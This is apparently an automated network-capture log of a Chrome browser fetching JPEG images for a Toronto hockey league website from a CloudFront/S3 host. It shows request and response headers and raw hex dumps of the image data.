                                                                                                                          2025-01-13 21:01:17 UTC12389INData Raw: f2 83 52 a8 41 c1 61 9c 56 b2 e9 1a 17 b7 11 a9 41 e5 25 8f 8b 24 5a ce 73 82 80 50 0a 01 40 28 05 00 a0 14 02 80 8c 36 d7 b5 86 f4 25 b3 dc db 6a d2 e5 ea 62 48 40 07 3c dd 1e 19 f2 f6 0a c5 56 a6 ca c2 e2 6e f4 36 8a 77 75 36 a7 d8 5f 1f 03 9a 74 de ac d4 1a 62 e4 ab 9d ae e4 fb 32 1c 56 f3 b9 56 f2 5d 24 e4 ef 03 d3 e9 a8 4a a3 4f 28 f4 0a ba 2e 8d c5 3d 8a 91 ca f9 13 46 9e ee a2 4a 50 96 b5 15 91 61 43 81 7e 12 b2 0f 94 a1 5d 1e 83 52 23 71 cc e5 ae f5 4e 49 e6 84 ff 00 67 f5 37 18 fd d0 9a 02 63 44 b9 3a 43 5d a8 76 32 ab 27 4d 03 53 2d 5f be 83 dd 1f 89 0e ed 87 55 e8 dd 4b 70 86 e6 96 88 1b 79 1b dc e5 f4 33 c9 25 cc e3 1c 3a cf 4f 1a 8b 59 c5 bf 44 ed 35 72 85 e5 bc 65 1b 99 65 77 2c e7 04 7c 2a 39 d6 23 ee 09 e0 3a e8 51 f0 3b 0d bb aa 34 56 cd
                                                                                                                          Data Ascii: RAaVA%$ZsP@(6%jbH@<Vn6wu6_tb2VV]$JO(.=FJPaC~]R#qNIg7cD:C]v2'MS-_UKpy3%:OYD5reew,|*9#:Q;4V


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          68192.168.11.204987854.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:17 UTC433OUTGET /app/uploads/gthl/2025/01/13092716/25-TP-Game-Move-1600x900-Web-730x411.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:17 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 54810
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:18 GMT
                                                                                                                          Last-Modified: Mon, 13 Jan 2025 14:27:18 GMT
                                                                                                                          ETag: "ee4428f72f40a9cd584a971cfc0a3999"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 0f954bea3b233fb0b6e1981b1e8b6bd8.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: pT4IHEUtNetTTV7sb0cHFFBSMGr9w5o1BHMQEmLuLt4wOND4wKcCIA==
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 26 00 26 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 01 9b 02 da 03 01 22 00 02 11 01 03 11 01 ff c4 00 1d 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 02 01 03 04 05 00 06 07 08 09 ff c4 00 59 10 00 01 02 04 04 04 03 05 05 03 06 0a 06 08 06 03 01 02 03 00 04 05 11 06 12 21 31 07 13 41 51 08 22 61 14 32 71 81 91 15 23 42
                                                                                                                          Data Ascii: JFIF&&CC"Y!1AQ"a2q#B
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: 98 8c 53 b1 8c c2 c4 b0 49 5a 1b 4a f2 97 14 7d 63 77 e2 c7 08 70 76 11 71 6f e0 c9 e9 86 a6 24 88 33 12 8f af 30 28 3b 29 37 d6 3e a3 c4 42 33 c8 f7 3f 99 47 0d 39 d2 75 16 c7 07 ac 55 c3 53 ae b0 b3 cc 24 d9 36 d2 d1 dc 7c 24 4c 15 71 ab 0a 37 ec f6 bb e6 ca ed e5 31 e7 da db 2a 5d 45 79 d3 a9 56 84 47 a0 7c 26 a1 e6 b8 d5 84 c3 4e 5f ef 8d d3 d7 dd 31 eb 83 d1 9e 57 1d 51 ee 4e 2c ca 87 38 bf 21 3a b5 65 2c 53 6c 9f 5b ae 26 4e 4e a9 6c 06 af e5 03 58 ad e3 24 d3 6c f1 5a 9d 2e 54 73 3b 20 3f 45 42 be e9 52 12 3f 8c 70 8e c6 6a 7a c1 bc ea 1a 4a 0a 50 2e 91 bc 43 15 60 da 9e 7d d7 2c 96 92 54 75 ec 22 2b b3 a0 bc ab ec 3a 46 9f 8d b1 0c 85 02 89 36 e4 d3 b6 7a 61 27 2a 6f b0 8d 1c f9 9a 64 8d 5d ec 47 5c 9e 9b 6d 4a 52 66 66 c8 1d ec 98 de 2a 34 e9 f9
                                                                                                                          Data Ascii: SIZJ}cwpvqo$30(;)7>B3?G9uUS$6|$Lq71*]EyVG|&N_1WQN,8!:e,Sl[&NNlX$lZ.Ts; ?EBR?pjzJP.C`},Tu"+:F6za'*od]G\mJRff*4
                                                                                                                          2025-01-13 21:01:17 UTC1639INData Raw: aa 72 72 33 13 33 b2 53 68 9d 75 87 99 98 78 58 ad 41 37 4a c0 b0 d0 8d 84 70 a1 55 c6 4d e6 b3 b6 9e f3 ea 71 3e 1a ab 51 85 38 52 cf 1c cb 32 d3 6d 76 bb 4a f7 b7 33 5c ad d7 a6 71 9e 35 ab e2 99 96 8b 6a aa ce 3f 38 a4 13 9b 26 75 15 65 bf 5b 03 6f 94 7b a3 c1 16 1d 62 95 c3 59 fa e7 27 ef 6a 95 25 27 3f 76 da 4a 42 47 d5 4a 8f 08 51 25 b9 8f 94 01 60 45 a3 e9 57 86 da 47 d8 7c 13 c3 12 b9 48 53 f2 eb 99 5d c6 a5 4e 38 a5 5f e9 68 f6 70 a4 e7 88 73 7d 87 e5 bc a4 d4 8e 0b 82 53 c2 d3 d1 39 45 5b d9 14 df e8 8e ab cd 4d ac 20 4e 6d d1 0c 8b e5 b2 53 73 78 32 b5 0d 08 22 3f 49 73 f8 29 85 c2 da 73 28 13 7d e1 c4 ba 83 6b 03 ac 33 9c 65 d4 fc 63 12 a4 ef 7b 5a 17 03 e1 79 49 d7 48 74 92 00 23 58 86 16 95 5d 20 5e fe b0 e3 79 c1 cb 7f ac 5b 82 51 39 85 ef
                                                                                                                          Data Ascii: rr33ShuxXA7JpUMq>Q8R2mvJ3\q5j?8&ue[o{bY'j%'?vJBGJQ%`EWG|HS]N8_hps}S9E[M NmSsx2"?Is)s(}k3ec{ZyIHt#X] ^y[Q9
                                                                                                                          2025-01-13 21:01:17 UTC10138INData Raw: dd 23 2e 8d 27 bc 57 71 b3 fd b5 30 41 48 23 41 a5 e1 53 88 26 93 94 a9 29 b8 8d 5d 0f 55 b5 71 52 ea c8 37 39 74 87 cb f3 01 21 4a 1b fa 46 df 1e e2 d4 36 c4 cf 5f f3 32 79 b5 19 7d c5 dc 6c 7f b4 33 05 44 f2 c1 ef 68 71 15 f5 29 5b 1b 0f 58 d5 55 3d 32 9b a9 2c 5d 23 78 c4 d5 56 a4 eb 2e 53 73 d6 3d 50 e9 47 1b 5e ae 26 5d e7 37 83 c3 fe 04 6d a9 c4 c5 2e 21 21 a5 1b 2b 43 78 b4 46 29 70 2a f7 3b 6d 78 d1 53 3e 94 84 8c 87 36 f6 87 d7 52 ca 9b a9 b2 09 da 3a 7f 6c f8 fc 7d 5a ef b9 78 19 f3 0c 2b de 08 dc db c4 60 15 1e 62 89 3a fc 20 d3 89 72 eb cc 55 84 69 6d 54 da 29 00 24 a7 bc 48 fb 4a 5c 34 2d e6 27 b4 74 fe de 74 86 16 b5 5b fc 17 81 9f b3 70 af ee 9b 92 71 43 6a 4d 92 a5 0b 6f 78 7d ac 48 9f 7b 39 20 c6 90 dc f3 45 20 a9 27 58 7d 13 ac 91 94 28
                                                                                                                          Data Ascii: #.'Wq0AH#AS&)]UqR79t!JF6_2y}l3Dhq)[XU=2,]#xV.Ss=PG^&]7m.!!+CxF)p*;mxS>6R:l}Zx+`b: rUimT)$HJ\4-'tt[pqCjMox}H{9 E 'X}(
                                                                                                                          2025-01-13 21:01:17 UTC9000INData Raw: 03 44 ad 2e 24 6a 3e 57 8d 71 5e 20 24 e6 a6 9c 96 6e b9 4a 76 45 44 36 c2 83 4f 15 6b 71 65 05 22 c7 5e 96 30 79 90 d1 9e 21 c3 fe 17 78 a5 56 4c b3 b5 29 39 1c 3e d4 e3 a2 5a 5d c9 f9 b0 84 ba e9 07 c8 80 34 26 c0 e9 71 1d 8f 0e ff 00 83 8e b3 38 cd ab 3c 48 a7 32 f2 91 98 a6 5e 4d 4e 0d 7a 02 56 07 ce c6 3b 2d 6f 1c 61 7a d6 1f 6b 08 e2 59 ba 74 e5 31 b9 96 df 6a 56 61 c7 52 12 eb 6b 0a 04 00 80 46 53 a8 b1 b6 f1 32 bf 8e 96 f5 2d d4 61 de 27 d0 e8 73 6c 32 1d 94 49 68 b8 1d 74 1b e5 70 af 54 b4 46 87 28 cd d8 c4 6e 5d 86 ac 8d 57 81 3e 04 b0 ee 02 e2 5d 3f 1c cd e2 b9 99 f3 41 99 13 12 cd 2a 4f 94 1f 50 49 01 46 ea 25 36 55 cd b5 b8 b6 ba c7 b4 c3 97 dc c7 07 91 f1 15 81 e9 ac ca 4b d4 2a c8 aa 56 66 32 34 59 a4 ca b8 e0 5b 84 0f 28 51 02 e2 f7 b1 31
                                                                                                                          Data Ascii: D.$j>Wq^ $nJvED6Okqe"^0y!xVL)9>Z]4&q8<H2^MNzV;-oazkYt1jVaRkFS2-a'sl2IhtpTF(n]W>]?A*OPIF%6UK*Vf24Y[(Q1
                                                                                                                          2025-01-13 21:01:17 UTC1265INData Raw: cc 73 88 d0 28 45 29 6a 02 53 70 94 a4 0e d1 85 0d b9 e6 5b 49 bc 50 95 be 9d d4 a1 00 66 e6 01 f2 ad 5f 58 80 d8 94 84 e5 b7 2c 0e d0 21 21 26 e0 69 1a f8 9d 9b 07 55 af eb 0e 89 f9 81 bb 84 08 a0 be c8 95 d8 94 81 6e 90 85 b4 de fa 02 62 90 55 66 7f 3c 61 ac 3c 35 26 00 b9 53 2d e6 0b 4a 52 4f 5b c2 2e 5c 2d 59 c2 44 52 1a f3 a3 70 3e 90 eb 75 c7 48 ba 92 2d 00 59 2a 50 7b d6 17 81 f6 5f ea fe 91 5e aa f8 1e f2 4c 67 ed 10 fc a6 20 2a 13 50 2d b7 6c a9 11 86 a0 a3 e6 cd ac 53 34 a5 15 29 24 92 3b 43 a3 41 13 98 2d 05 55 c4 1b 85 41 a6 bc f8 19 42 84 52 9d e3 14 4e 5b c0 17 a8 c4 0f 58 82 7e 07 b4 38 71 0a d6 00 36 d2 28 e4 f5 70 a4 ea 08 31 1c df 98 a1 7d 01 31 b5 12 b3 63 4e 20 cb 70 ab 46 0c 42 8b dc a4 5a 28 d8 6d 0a 58 cc 90 62 60 61 90 de 8d a7 af
                                                                                                                          Data Ascii: s(E)jSp[IPf_X,!!&iUnbUf<a<5&S-JRO[.\-YDRp>uH-Y*P{_^Lg *P-lS4)$;CA-UABRN[X~8q6(p1}1cN pFBZ(mXb`a


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          69192.168.11.204988054.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:17 UTC428OUTGET /app/uploads/gthl/2025/01/02124840/GTHL-Officials-1600x900-730x411.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:17 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 90825
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:18 GMT
                                                                                                                          Last-Modified: Thu, 02 Jan 2025 17:48:42 GMT
                                                                                                                          ETag: "7219e58173ff112fd7ed0bb3979b1eeb"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 d01a0cfc47d6e412dd81c986ff5d69da.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: 09f_QOydKPOl7cpqzBm_k9w8xumDA3a2UJyZW9yP8OsaFfIKgEQ3iA==
                                                                                                                          2025-01-13 21:01:17 UTC8192INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 c5 00 c5 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 01 9b 02 da 03 01 22 00 02 11 01 03 11 01 ff c4 00 1e 00 00 02 02 03 01 01 01 01 00 00 00 00 00 00 00 00 08 09 06 07 03 04 05 02 01 00 0a ff c4 00 5a 10 00 01 02 05 02 03 05 04 06 06 07 05 05 05 04 0b 01 02 03 00 04 05 06 11 07 21 08 12 31 09 13 41 51 61 14 22 71 81 32 42 91
                                                                                                                          Data Ascii: JFIFCC"Z!1AQa"q2B
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: a7 9a 58 d5 c0 c2 6a d7 4c b7 35 39 cc 16 a4 d5 90 26 47 9a c7 fc bf dd fa de 3b 75 eb 6a a7 13 3a 25 a2 0d 99 0b b2 ec 96 15 06 11 ca 8a 3d 35 02 62 6d 20 0d 92 5a 46 cd 0c 63 1c e5 22 02 9e 22 78 f9 bb 6f 47 26 2d 4d 1e 72 6a d7 b7 13 96 57 50 47 ea ea 13 a8 e9 ee 91 fe ee d9 f0 4a 7d fc 75 23 a4 08 33 53 2f 3e ea dc 79 f5 b8 e3 aa 2b 71 c2 a2 a5 2d 44 e4 a9 44 ee 49 f3 31 36 ce 4a ca 10 d1 0d 46 d6 a2 f6 9e dd b3 6a 72 57 4b ac 0a 7d 29 93 90 89 ba cb 8a 9a 7c 8f 03 dd 36 52 da 4f c5 4a 81 7f 52 b8 8f d6 9d 4c ad ca 57 6e 9d 41 ab 2a 66 44 1f 64 12 4e fb 1b 52 f9 3e f1 42 19 e5 00 9c 0d ce 4e 07 58 ae dd 77 91 3c c5 49 04 9e 51 ce 71 bc 68 3a ef 3a c0 ef 52 a1 e1 ca 47 48 60 63 85 32 79 56 c5 2f 8a be 23 a8 c8 4b 14 ed 69 ba 83 69 fa 21 d9 de f8 01 e1
                                                                                                                          Data Ascii: XjL59&G;uj:%=5bm ZFc""xoG&-MrjWPGJ}u#3S/>y+q-DDI16JFjrWK})|6ROJRLWnA*fDdNR>BNXw<IQqh::RGH`c2yV/#Kii!
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: 87 d2 2a f5 f7 30 c9 4b b7 15 47 b9 65 44 6e 59 64 63 ec e6 27 ec 8b d8 41 68 2d e0 ac 2a b4 9d 41 c6 95 41 0e 06 08 ed 08 c5 a6 2f 92 b0 b0 4f d2 4c 2b de d3 eb 9c d4 f8 85 97 b7 bb e2 a6 e8 94 19 64 f2 78 21 6f 29 4e 2b e7 8e 58 67 4c 2f bb ac a3 d4 62 13 0f 18 37 9b 77 d7 13 77 dd 79 a7 39 e5 c5 40 c8 b0 73 b1 6e 5d 21 a1 8f 9a 4c 5c d3 00 94 87 85 4c cc af dc c0 e8 60 e6 ec b9 d2 ff 00 d3 57 d5 63 54 27 e5 f9 a5 ed c9 5f 65 94 52 86 de d4 f7 52 3e 08 07 fb d0 0a be b0 5c 00 43 9f e0 73 4d 86 9a 70 e1 6e 4b cc 4b 86 a7 eb c1 55 89 bd b0 a2 5d 39 40 3f 04 04 c2 93 26 15 63 98 44 07 46 c6 62 a6 e2 83 56 d8 d1 8d 16 b8 2f 7f d5 2e 75 96 04 b5 39 a7 3a 3b 36 e9 e5 6c 63 c4 02 79 8f a2 4c 5a eb 56 11 88 58 1d a7 5a da 9b 92 f7 a7 68 f5 16 68 ae 46 d8 1e d7
                                                                                                                          Data Ascii: *0KGeDnYdc'Ah-*AA/OL+dx!o)N+XgL/b7wwy9@sn]!L\L`WcT'_eRR>\CsMpnKKU]9@?&cDFbV/.u9:;6lcyLZVXZhhF
                                                                                                                          2025-01-13 21:01:18 UTC12597INData Raw: 4f d3 1d e5 70 24 9c 78 43 2a ec a8 b8 0f e8 fd 46 b7 14 af a2 24 2a 08 03 e0 e3 67 1f 60 85 9a 92 a9 79 9e 52 7c 7a 88 3b bb 2d eb be cd ab 57 35 15 6e 72 9a 95 b6 b5 25 3e 65 97 90 af c1 46 00 e1 42 47 09 8b 6a fc fa 64 6d 69 66 c8 20 38 f0 27 27 c1 29 24 c2 ad d2 9e 26 2e 5d 2f af 4e a3 1f a5 6d 89 f9 b9 81 39 49 7b 05 a5 34 b7 14 49 6c 2b 60 70 7a 1d 8f 8f 9c 33 8e 20 79 85 ac c8 46 12 a2 c4 d1 18 3b e7 ba 30 92 e4 e6 4a 79 98 5a bd f1 9f 7a 3c dd b6 16 da e7 88 b5 2b 6b d6 07 31 b4 e8 36 0f a8 7b a4 76 32 79 19 0b ad 37 55 34 fd 26 d9 f4 4c 17 39 e4 fa c4 08 3e 88 cc d4 0b 32 6a b5 a5 95 3b cb 85 eb 8a 69 76 75 59 b5 ae bb 6b 37 85 b9 23 91 ef 96 52 ac a9 29 c7 d2 6c 1c 81 ba 72 22 b2 b0 9d fd 31 c2 9e a0 51 54 ae 77 29 33 f2 f3 c9 03 a8 49 28 39 1f
                                                                                                                          Data Ascii: Op$xC*F$*g`yR|z;-W5nr%>eFBGjdmif 8'')$&.]/Nm9I{4Il+`pz3 yF;0JyZz<+k16{v2y7U4&L9>2j;ivuYk7#R)lr"1QTw)3I(9
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: fa 94 fe 10 8d ac 87 02 2e da 42 88 e9 38 d1 cf f3 08 78 9a 5e ae 7b 26 98 af fb 94 fe 11 63 be 04 ed 38 52 c1 18 2a 03 32 6e 8f dd 31 b0 3a 46 19 d1 99 57 47 ee 98 a4 a8 92 57 13 ac f7 1a e5 78 b7 80 3f ed 15 9f b8 45 4d 92 71 9f 0e b1 73 f1 65 2f dc 6b ed dc d9 d8 19 c0 a1 f3 48 8a 65 47 c3 1d 62 d6 18 60 55 84 5f f6 71 3e 51 a9 73 8d f5 cb 68 fb 33 0d 59 a3 ee 88 54 9d 9c a8 27 53 e6 94 70 30 da 46 3e 70 d6 19 3d 22 3f 80 ad 1c 05 f6 61 39 41 3e 90 a2 bb 41 c6 75 f9 fc 8f ff 00 97 b3 f8 aa 1b bb db b6 71 e5 0a 37 b4 2d b2 9d 7d 75 58 eb 4e 67 7f 9a a2 b1 f1 04 8f 42 e3 a3 07 e3 1d ab 01 b2 fd ed 43 69 20 92 a9 f6 46 3a e7 df 11 c7 56 f9 db ac 4a f4 6d 84 bd aa 56 ea 0a 79 87 b7 b5 f8 c5 cd e4 28 39 4e ff 00 4f d0 59 b4 e9 8d 28 60 89 74 6d f2 81 d7 b4
                                                                                                                          Data Ascii: .B8x^{&c8R*2n1:FWGWx?EMqse/kHeGb`U_q>Qsh3YT'Sp0F>p="?a9A>Auq7-}uXNgBCi F:VJmVy(9NOY(`tm
                                                                                                                          2025-01-13 21:01:18 UTC5408INData Raw: 4a b9 a5 2d 5e 14 ca a4 f4 8c f3 c1 87 65 9c e6 43 a8 2a db 07 a1 3f 08 46 36 49 c2 12 42 a3 78 ba b0 18 a7 49 d1 2e aa 6c a8 6d 96 73 20 f8 42 30 13 b6 51 d3 e0 44 0d 29 48 d8 c3 2c d6 cd 2c 9a b8 ec 3a c5 06 6e 5f 98 bc c2 9c 97 20 7d 17 50 32 93 f6 88 5a ef 30 e4 b3 ee 4b be 92 87 1a 59 42 d2 46 e1 40 e0 8f b4 42 91 06 14 10 a5 5a 69 78 ce d8 37 a5 2a ea 90 59 43 92 33 09 71 40 7d 64 67 de 1f 64 37 cb 6e 72 4a f1 b6 a9 97 55 19 c4 b9 2d 50 96 44 c0 23 7f a4 33 8f 91 84 be ca 72 a8 61 5d 9e fa c4 9a b5 1a 6f 49 eb 53 39 98 90 06 62 9f ce 72 54 d7 d6 40 f8 18 b9 9e 60 42 87 28 b1 a3 cd cc d2 e6 d0 b4 28 80 93 d2 2b de 2f 38 75 93 d7 9b 23 fa 63 6b 4a 36 9b be 8a c9 53 78 18 33 8c 8d d4 ca bd 7c 52 7c fe 31 6c b9 20 95 2f 21 3d 63 a1 45 7e 62 9a ff 00 29
                                                                                                                          Data Ascii: J-^eC*?F6IBxI.lms B0QD)H,,:n_ }P2Z0KYBF@BZix7*YC3q@}dgd7nrJU-PD#3ra]oIS9brT@`B((+/8u#ckJ6Sx3|R|1l /!=cE~b)
                                                                                                                          2025-01-13 21:01:18 UTC14208INData Raw: 35 52 a2 4c 21 b5 b9 80 0b 8c b8 79 4a 4f c0 e0 88 a4 78 00 d0 6b 3b 53 a6 ea 57 c5 d7 2a 27 d3 47 7d 2d cb 4b af 76 fb ce bc c4 78 c3 31 c7 6e 7a 2a f3 30 b9 7c 3b f0 fb ab 14 2a 2c df 10 32 f2 c9 a6 b7 6f 49 3d 3d 4e 96 98 49 e7 9d 52 50 4f 4f aa 92 07 58 b2 b8 ab bd 6b da ad c1 15 bb 7d 26 64 1a 8f e9 09 5a 8c df 76 31 ef 20 a8 ab 03 c0 02 7e e8 3c 67 68 72 6f db 73 34 54 4b a1 32 ee cb 2d 8e ed 29 c2 79 4a 48 c6 3e 10 b8 26 aa 6d 4a f0 bd 74 58 33 a4 f3 db b5 4a a4 aa 9b 3e 09 47 78 07 e0 20 6e 71 04 1f a2 71 e5 59 f4 96 f0 17 75 99 47 b8 1b 73 2e b8 c0 43 d8 df f5 89 d9 5f eb 16 ce 24 eb d4 59 aa 2d 49 84 bd 2d 3a c2 99 75 2a e8 52 a1 83 01 e7 06 b7 a3 4f 35 51 b2 26 9d 01 6d 91 37 2c 92 7a 8d 82 80 fc 60 be a5 03 91 bf 84 39 18 50 cc 25 8d ac 1a 6d
                                                                                                                          Data Ascii: 5RL!yJOxk;SW*'G}-Kvx1nz*0|;*,2oI==NIRPOOXk}&dZv1 ~<ghros4TK2-)yJH>&mJtX3J>Gx nqqYuGs.C_$Y-I-:u*RO5Q&m7,z`9P%m
                                                                                                                          2025-01-13 21:01:18 UTC1268INData Raw: 86 76 89 1e 9e 56 2e bb 2e ec a5 dd b4 64 4c 30 e4 93 e9 73 bc e5 52 52 a4 fd 61 cd d0 82 21 bc f0 9f c3 06 80 48 59 d2 37 62 34 b6 8b 31 57 52 42 fd ae 75 0b 9b 58 56 06 e3 be 52 80 f9 08 24 2a f6 7d a5 50 a7 ae 9d 3d 6b d2 5f 95 52 79 4b 2e 49 36 a4 63 cb 18 c4 2d 3a 85 c3 73 51 04 94 9a ef ae 24 f5 22 f0 96 72 97 2f 5b 9b a6 53 5c 49 42 9b 69 d2 97 1c 49 ea 14 a0 76 1e 82 2a ae ff 00 0a e5 6c ed f7 c1 bf c7 6e 88 69 4d 93 4a 37 0d a3 65 49 52 27 9d c9 5a e5 14 e3 69 51 f5 40 57 27 dd 00 bb 5e 03 e7 17 32 af be 9f 44 a5 f2 60 ad a4 be a1 b1 57 ac 75 6d 9b ce e2 b2 2b 32 b7 15 ab 58 98 a6 54 a4 96 16 cb ec 38 52 a1 8f c4 79 83 b1 8e 0e 4f 9f 84 6b 4d 28 a4 00 93 88 b6 48 e1 10 60 a7 0d c1 ff 00 16 28 d7 ab 2d c6 2b dd cb 37 4d 13 95 aa 83 4d 9c 07 90 7e
                                                                                                                          Data Ascii: vV..dL0sRRa!HY7b41WRBuXVR$*}P=k_RyK.I6c-:sQ$"r/[S\IBiIv*lniMJ7eIR'ZiQ@W'^2D`Wum+2XT8RyOkM(H`(-+7MM~


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          70192.168.11.204987954.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:17 UTC678OUTGET /app/uploads/gthl/2023/05/02161525/START-HOCKEY-1080x1080-Start-Somewhere-320x320.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:17 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 37230
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:18 GMT
                                                                                                                          Last-Modified: Tue, 02 May 2023 20:15:27 GMT
                                                                                                                          ETag: "424cf4d71d15d9541b3400e0f07a228b"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 65515d7b1028cd133489fb761d35fa06.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: Oh8L7tL1zHHNLXCVKz9BhCFOltDMSqCY_ll1avJ2rV0BpVeW6Qzdxg==
                                                                                                                          2025-01-13 21:01:17 UTC15897INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 26 00 26 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 01 40 01 40 03 01 22 00 02 11 01 03 11 01 ff c4 00 1d 00 00 01 05 01 01 01 01 00 00 00 00 00 00 00 00 00 04 03 05 06 07 08 02 01 09 00 ff c4 00 4c 10 00 02 01 02 05 02 03 06 02 07 05 06 04 03 09 00 01 02 03 04 11 00 05 06 12 21 07 31 13 41 51 08 14 22 61 71 81 32 91 15 23 42
                                                                                                                          Data Ascii: JFIF&&CC@@"L!1AQ"aq2#B
